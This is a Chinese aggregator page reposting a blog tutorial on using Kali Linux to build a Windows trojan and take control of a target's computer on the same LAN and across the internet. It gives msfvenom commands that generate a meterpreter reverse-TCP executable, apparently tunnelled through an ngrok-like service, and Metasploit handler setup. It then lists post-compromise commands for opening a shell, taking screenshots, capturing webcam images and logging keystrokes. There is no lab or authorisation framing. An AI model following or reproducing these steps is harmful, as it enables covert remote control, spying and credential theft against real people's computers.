我的编程空间,编程开发者的网络收藏夹
学习永远不晚

kali渗透内网和外网

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

kali渗透内网和外网

生成木马文件,从而控制对方电脑(这里只能在同一个局域网下才能入侵)

第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:

-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”

lhost:设置kali的IP

lport:设置端口(要与下面的setlport保持一致)

-f:文件的类型为exe类型

-o:生成payload,名为payload.exe,保存在kali的/root目录下

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.77 lport=5000 -f exe -o /root/tjy.exe

第二步:将生成的木马文件发送到对方电脑

我们启动kali

msfconsole 进入msfconsole

use exploit/multi/handler 使用这个漏洞辅助

设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set payload windows/meterpreter/reverse_tcp

设置一个lhost和lport,要与文章最开始的msfvenom命令中的IP和端口保持一致

exploit 或 run

接下来我们只要等对方电脑运行刚刚那个木马

生成木马文件,从而控制对方电脑(内网可以入侵外网)

在开始生成木马之前,我们要先做好准备工作

在kali里面要下载Sunny-Ngrok的Linux64版本,下载好后解压

接着我们要在Sunny-Ngrok注册登陆,这里要买个隧道,但是免费的,就是认证要花2元,这个隧道是帮助我们做内网穿透的,但这个免费的隧道服务器在美国那边,所以有的时候可能不太好用

这里将下载好的linux64压缩包进行解压

命令解压缩:unzip linux_amd64(压缩包名)

进入解压好的目录

cd linux_amd64

启动隧道映射TCP服务

./sunny clientid (隧道id) 这里的隧道id看下图

启动后是这样的

接下来就是生成外网的木马程序了

注意:这里lhost和lport分别为赠送的域名和端口

msfvenom -p windows/meterpreter/reverse_tcplhost=xxx.xxx.com lport=10306 -f exe -o /root/shell.exe

接下来就是在msf中设置payload,加载攻击模块设置本地IP何监听端口了

msfconsole 打开msf

use exploit/multi/handler 使用这个漏洞辅助

set payload windows/meterpreter/reverse_tcp 设置payload为刚才反向远程控制程序名称(windows/meterpreter/reverse_tcp)

set LHOST 192.168.245.140 这里设置成kali的IP

set LPORT 4444 这里是你要侦听的端口

这里设置的IP和侦听的端口后生成外网木马程序时的IP和端口时不一样的,因为我们这是内网入侵外网

show options 查看IP端口设置情况

exploit 或 run 开启侦听

接下来我们只要等对方电脑运行刚刚那个木马

成功后时以下这图

入侵成功后所能做的(这只是可以做的一部分)

getuid 获取靶机uidmeterpreter

shell 进入靶机shellmeterpreter

screenshot 靶机截屏meterpreter

webcam_snap 用靶机摄像头拍照meterpreter

webcam_stream 用靶机摄像头录像meterpreter

keyscan_start 开启键盘记录meterpreter

keyscan_dump 捕获键盘记录

keyscan_stop 停止键盘记录

来源地址:https://blog.csdn.net/weixin_62693307/article/details/130198360

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

kali渗透内网和外网

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

云服务器内网穿透可以访问外网

云服务器内网穿透(NAT)可以访问外网,这种情况下,需要确保服务器之间的网络通信是私有的,不被其他人监听和控制。具体操作如下:使用云服务器的内部IP或域名访问网络。如果使用的是公共IP地址(例如,IPv4或IPv6),可以使用公共NAT模块来访问内部网络。设置内部访问的HTTP请求。使用内部IP地址,可以通过HTTP协议访问外部网络。需要确保在请求中加入一个HTTP头(通常是`restfu
2023-10-26

云服务器内网穿透可以访问外网吗

是的,云服务器可以提供内网穿透功能,允许您访问外网。这通常涉及在公共Internet骨干网的不同节点之间进行通讯,但您的客户端不能直接访问该网络。在这种情况下,通常需要使用一些安全技术,例如VPN、代理服务器或加密技术。一些常见的云服务器的内网穿透方法包括:代理服务器:向A租用云服务器的一台虚拟代理服务器。VPN隧道:创建一个虚拟的IP地址,连接该IP地址所在的公共Internet骨干网以进行通讯。密钥管理:使用PKI技...
2023-10-27

ipv6内网穿透,有ipv6地址外网无法访问

问题描述 光猫已经开启ipv6,并且电脑/服务器已经有ipv6地址,只能通过ipv6局域网访问,外网/手机流量访问设备 原因分析: 光猫没有关闭防火墙路由器入站防护 解决方案: 1.光猫没有关闭防火墙 这里以中国移动的光猫为例,登陆光
2023-08-19

云服务器内网和外网

云服务器内网和外网指的是不同的虚拟网络,它们之间的区别在于物理网络位置和数据流量。内网是指一台物理服务器,内网与外部通信通过网络进行。因此,内网可以访问外部网站,例如使用网站的域名或者使用网站提供的API进行远程连接。内网访问外网的方式可以包括但不限于:通过网卡进行网路通畅连接,可以通过内网访问外部网站,例如使用网站的域名或者使用网站提供的API进行远程连接。在VPN连接中创建虚拟网络,
2023-10-26

外网SSH远程连接linux服务器「cpolar内网穿透」

文章目录 视频教程1. Linux CentOS安装cpolar2. 创建TCP隧道3. 随机地址公网远程连接4. 固定TCP地址5. 使用固定公网TCP地址SSH远程 转载自内网穿透工具的文章:无公网IP,SSH远程连接L
2023-08-19

内网穿透和云服务器

内网穿透和云服务器都是常用的网络安全技术,它们都可以帮助企业网络在内部网(Intranet)和外部网络(Extranet)之间移动业务数据,从而减少网络攻击的风险。内网穿透主要是通过在内部网中部署一些安全设备(如防火墙、防病毒软件等),这些设备可以监视网络流量,并检测内部网络是否存在未授权的活动或者敏感信息泄露的风险。通过检测到这些活动,企业可以及时采取措施阻止这些活动,防止网络攻击的发生和扩
2023-10-26

网站渗透常用Python小脚本查询同ip网站

旁站查询来源: http://dns.aizhan.com http://s.tool.chinaz.com/same http://i.links.cn/sameip/ http://www.ip2hosts.com/ 效果图如下: 以百
2022-06-04

网站渗透测试安全检测方案

许多客户在网站,以及APP上线的同时,都会提前的对网站进行全面的渗透测试以及安全检测,提前检测出存在的网站漏洞,以免后期网站发展过程中出现重大的经济损失,前段时间有客户找到我们SINE安全公司做渗透测试服务,在此我们将把对客户的整个渗透测试
2023-06-03

编程热搜

目录